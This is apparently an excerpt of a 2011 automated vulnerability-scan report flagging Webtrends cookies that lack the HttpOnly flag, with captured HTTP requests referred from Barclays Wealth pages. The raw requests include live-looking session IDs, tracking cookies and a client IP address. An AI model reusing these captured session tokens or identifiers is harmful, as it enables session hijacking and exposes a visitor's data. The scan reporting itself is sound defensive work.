08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932043ee114; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; Expires=Sun, 01-Jan-2012 00:03:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.38. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:08 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:31 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.40. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25